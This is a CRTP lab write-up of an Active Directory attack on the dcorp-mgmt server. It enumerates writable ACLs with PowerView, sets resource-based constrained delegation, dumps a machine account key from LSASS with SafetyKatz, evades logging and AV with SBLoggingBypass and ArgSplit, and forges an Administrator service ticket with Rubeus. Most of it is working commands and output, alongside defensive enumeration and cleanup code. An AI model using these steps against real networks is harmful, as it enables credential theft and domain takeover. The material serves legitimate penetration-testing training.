# CRTP Lab 17

## Task 1

Find a computer object in dcorp domain where we have Write permissions.

Use PowerView to enumerate Write permissions held by each user we have compromised so far.

After trying this from each compromised user, or in BloodHound (select the ciadmin node and open **Outbound Object Control**), we find that the user ciadmin has GenericWrite on the computer object of dcorp-mgmt:

{% code overflow="wrap" %}

```powershell
PS C:\Users\student372> Find-InterestingDomainACL | ?{$_.identityreferencename -match 'ciadmin'}
```

{% endcode %}

Since we already have a reverse shell as ciadmin from Jenkins (set up in an earlier lab), start a netcat listener on the student VM to catch it, then load the ScriptBlock logging bypass (SBLoggingBypass) and PowerView in that shell before running the enumeration above.

```
C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 443

# In the reverse shell: run SBLoggingBypass, load PowerView, then run Find-InterestingDomainACL as above.
```
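Because Find-InterestingDomainACL lists every interesting ACE in the domain, filtering by identity name alone also returns rights on users, groups and OUs. The following added example (not the lab page's own code) narrows the question to what matters for RBCD: which computer objects a compromised principal can write to, and, seen from the target side, which non-default principals can write to a given computer. It assumes PowerView is already loaded in the session; ciadmin and dcorp-mgmt are the lab's names, the rest is generic.

```powershell
# Added example, not the lab page's own code. Assumes PowerView is loaded in this
# session (Find-InterestingDomainACL, Get-DomainComputer, Get-DomainObjectAcl, ConvertFrom-SID).
# 'ciadmin' and 'dcorp-mgmt' are the lab's names; everything else is generic.

# Rights that allow editing msDS-AllowedToActOnBehalfOfOtherIdentity on a computer object.
# WriteProperty only counts when the ACE's ObjectAceType is 'All' or that attribute,
# so ObjectAceType is kept in the output for the reader to judge.
$WriteRights = 'GenericAll|GenericWrite|WriteDacl|WriteOwner|WriteProperty'

# Principals that normally hold write on every computer object; skipping them makes
# real misconfigurations stand out (names as ConvertFrom-SID renders them).
$ExpectedWriters = 'Domain Admins|Enterprise Admins|BUILTIN\\Administrators|Local System|Principal Self|Creator Owner|Account Operators|Enterprise Domain Controllers'

function Find-WritableComputerObjects {
    <# Computer objects on which $Principal holds a write-class right. #>
    param([Parameter(Mandatory)][string]$Principal)

    # Find-InterestingDomainACL does not report the object class, so resolve the
    # DNs of all computer objects first and keep only ACEs that target one of them.
    $ComputerDNs = Get-DomainComputer | Select-Object -ExpandProperty distinguishedname

    Find-InterestingDomainACL -ResolveGUIDs |
        Where-Object { $_.IdentityReferenceName -match $Principal } |
        Where-Object { $_.ActiveDirectoryRights -match $WriteRights } |
        Where-Object { $ComputerDNs -contains $_.ObjectDN } |
        Select-Object ObjectDN, ActiveDirectoryRights, ObjectAceType, IdentityReferenceName
}

function Get-ComputerWriters {
    <# Non-default principals with a write-class right on one computer object. #>
    param([Parameter(Mandatory)][string]$ComputerName)

    Get-DomainObjectAcl -Identity $ComputerName -ResolveGUIDs |
        Where-Object { $_.ActiveDirectoryRights -match $WriteRights } |
        ForEach-Object {
            [pscustomobject]@{
                Principal = ConvertFrom-SID ([string]$_.SecurityIdentifier)
                Rights    = $_.ActiveDirectoryRights
                AceType   = $_.ObjectAceType
            }
        } |
        Where-Object { $_.Principal -notmatch $ExpectedWriters }
}

# Attacker's view: what can the compromised user write to?
Find-WritableComputerObjects -Principal 'ciadmin'

# Target's view: who, apart from the usual admin groups, can write to this server?
Get-ComputerWriters -ComputerName 'dcorp-mgmt'
```

Run the first function from the ciadmin shell and the second from any domain user; on a clean domain the second should return nothing for a server, so a hit like ciadmin with GenericWrite is exactly the RBCD path this lab abuses.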

## Task 2

Abuse the Write permissions to access that computer as Domain Admin.

Since ciadmin has GenericWrite on the dcorp-mgmt computer object and we have a shell as ciadmin, we can set resource-based constrained delegation (the msDS-AllowedToActOnBehalfOfOtherIdentity attribute) on dcorp-mgmt.

Here, the first hop is the student machine account (dcorp-std372$), and the second hop, the resource, is dcorp-mgmt.

{% code overflow="wrap" %}

```powershell
PS C:\Users\Administrator\.jenkins\workspace\Project0> Set-DomainRBCD -Identity dcorp-mgmt -DelegateFrom 'dcorp-std372$' -Verbose
```

{% endcode %}
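What Set-DomainRBCD does for us, as an added example that is not the lab page's own code: it writes a security descriptor into msDS-AllowedToActOnBehalfOfOtherIdentity whose DACL names the delegating account. The block below performs the same change with PowerView's lower-level Get-DomainComputer/Set-DomainObject, reads the attribute back and decodes the SID in it, and clears it again for cleanup. It assumes PowerView is loaded in a session running as ciadmin; the computer names are the lab's.

```powershell
# Added example (not the page's own code): what Set-DomainRBCD does under the hood.
# Assumes PowerView (Get-DomainComputer, Set-DomainObject, ConvertFrom-SID) is loaded
# in a session that runs as ciadmin, who holds GenericWrite on the dcorp-mgmt object.
# Computer names are the lab's; the SDDL and .NET types are standard.

$Target   = 'dcorp-mgmt'      # resource whose attribute we can write
$Delegate = 'dcorp-std372$'   # machine account we control (the first hop)

function Set-RbcdRaw {
    param([Parameter(Mandatory)][string]$TargetComputer,
          [Parameter(Mandatory)][string]$DelegateAccount)

    # Get-DomainComputer matches on the object name, which has no trailing '$'.
    $DelegateSid = (Get-DomainComputer -Identity $DelegateAccount.TrimEnd('$') -Properties objectsid).objectsid
    if (-not $DelegateSid) { throw "Could not resolve SID for $DelegateAccount" }

    # The attribute stores a security descriptor; every Allow ACE in its DACL names a
    # principal that may act on behalf of other identities towards the target.
    $Sddl  = "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$DelegateSid)"
    $SD    = New-Object System.Security.AccessControl.RawSecurityDescriptor -ArgumentList $Sddl
    $Bytes = New-Object byte[] ($SD.BinaryLength)
    $SD.GetBinaryForm($Bytes, 0)

    Set-DomainObject -Identity $TargetComputer -Set @{'msds-allowedtoactonbehalfofotheridentity' = $Bytes}
}

function Get-RbcdRaw {
    param([Parameter(Mandatory)][string]$TargetComputer)

    $Raw = Get-DomainComputer -Identity $TargetComputer -Properties 'msds-allowedtoactonbehalfofotheridentity' |
        Select-Object -ExpandProperty 'msds-allowedtoactonbehalfofotheridentity'
    if (-not $Raw) { return @() }   # attribute absent: no RBCD configured on this host

    $SD = New-Object System.Security.AccessControl.RawSecurityDescriptor -ArgumentList $Raw, 0
    foreach ($Ace in $SD.DiscretionaryAcl) {
        [pscustomobject]@{
            Target      = $TargetComputer
            DelegateSid = $Ace.SecurityIdentifier.Value
            Delegate    = ConvertFrom-SID $Ace.SecurityIdentifier.Value
            AceType     = $Ace.AceType
        }
    }
}

function Clear-RbcdRaw {
    param([Parameter(Mandatory)][string]$TargetComputer)
    # Cleanup at the end of the engagement: removing the attribute removes the path.
    Set-DomainObject -Identity $TargetComputer -Clear 'msds-allowedtoactonbehalfofotheridentity'
}

Set-RbcdRaw -TargetComputer $Target -DelegateAccount $Delegate
Get-RbcdRaw -TargetComputer $Target      # expect one AccessAllowed ACE resolving to DCORP-STD372$
# Clear-RbcdRaw -TargetComputer $Target  # run once the lab is finished
```

Reading the attribute back is the check to trust: a DACL with more than one ACE, or an ACE for an account you do not control, means someone else already set delegation on that host, and overwriting it with -Set rather than appending to it destroys their entry, which is both noisy and destructive on a real engagement.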

Let's check if RBCD is correctly set:

{% code overflow="wrap" %}

```powershell
PS C:\Users\Administrator\.jenkins\workspace\Project0> Get-DomainRBCD


SourceName                 : DCORP-MGMT$
SourceType                 : MACHINE_ACCOUNT
SourceSID                  : S-1-5-21-719815819-3726368948-3917688648-1108
SourceAccountControl       : WORKSTATION_TRUST_ACCOUNT
SourceDistinguishedName    : CN=DCORP-MGMT,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
ServicePrincipalName       : {WSMAN/dcorp-mgmt, WSMAN/dcorp-mgmt.dollarcorp.moneycorp.local, TERMSRV/DCORP-MGMT,
                             TERMSRV/dcorp-mgmt.dollarcorp.moneycorp.local...}
DelegatedName              : DCORP-STD372$
DelegatedType              : MACHINE_ACCOUNT
DelegatedSID               : S-1-5-21-719815819-3726368948-3917688648-13682
DelegatedAccountControl    : WORKSTATION_TRUST_ACCOUNT
DelegatedDistinguishedName : CN=DCORP-STD372,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
```

{% endcode %}

The above output reads: the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of dcorp-mgmt now names dcorp-std372$. Whoever holds the credentials of that machine account can perform S4U2self followed by S4U2proxy and obtain a service ticket for any SPN hosted on dcorp-mgmt (HTTP, CIFS, LDAP, and so on) as almost any domain user, including a Domain Admin. The exception is accounts marked "Account is sensitive and cannot be delegated" or placed in the Protected Users group, which S4U2proxy will not impersonate; the lab's Administrator is neither.

Note what setting RBCD as ciadmin did and did not change: ciadmin gained no rights on dcorp-mgmt itself, it only chose which account dcorp-mgmt trusts for delegation, and the account it named, dcorp-std372$, is the student machine's own account, which we already control as local administrator.

Therefore, the next step is to extract that machine account's Kerberos keys from LSASS on the student machine (elevated prompt):

{% code overflow="wrap" %}

```
C:\AD\Tools\Loader.exe -Path C:\AD\Tools\SafetyKatz.exe -args "sekurlsa::ekeys" "exit"
```

{% endcode %}

Which AES key to use?

The one listed for the logon session with SID S-1-5-18 (Local SYSTEM). When SYSTEM authenticates to the domain it does so as the computer account, so that aes256 key is the key of dcorp-std372$; the other sessions belong to interactive users and are of no use for RBCD.

From a normal (non-elevated) cmd on student372, use this key with Rubeus s4u to abuse the delegation. Rubeus first requests a TGT for dcorp-std372$ with the key (overpass-the-hash), then performs S4U2self for the impersonated user and S4U2proxy for the requested SPN, and injects the resulting service ticket with /ptt.

Here, as dcorp-std372$ (the first hop), we request a ticket for the HTTP service on dcorp-mgmt (the SPN used by WinRM) as the Administrator:

{% code overflow="wrap" %}

```
# Build %Pwn% first by running C:\AD\Tools\ArgSplit.bat with the string "s4u"

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /user:dcorp-std372$ /aes256:e63b5208ef1a22959561117ec6034f9fd5ba36e00194776af4eea427af5b3da2 /msdsspn:http/dcorp-mgmt /impersonateuser:administrator /ptt
```

{% endcode %}

Since the ticket was injected into the current logon session (/ptt), we can use either winrs or PowerShell Remoting to reach dcorp-mgmt as Administrator:

```
C:\Users\student372>winrs -r:dcorp-mgmt cmd
Microsoft Windows [Version 10.0.20348.2227]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Administrator.dcorp>set username
set username
USERNAME=Administrator

C:\Users\Administrator.dcorp>set computername
set computername
COMPUTERNAME=DCORP-MGMT

C:\Users\Administrator.dcorp>
```
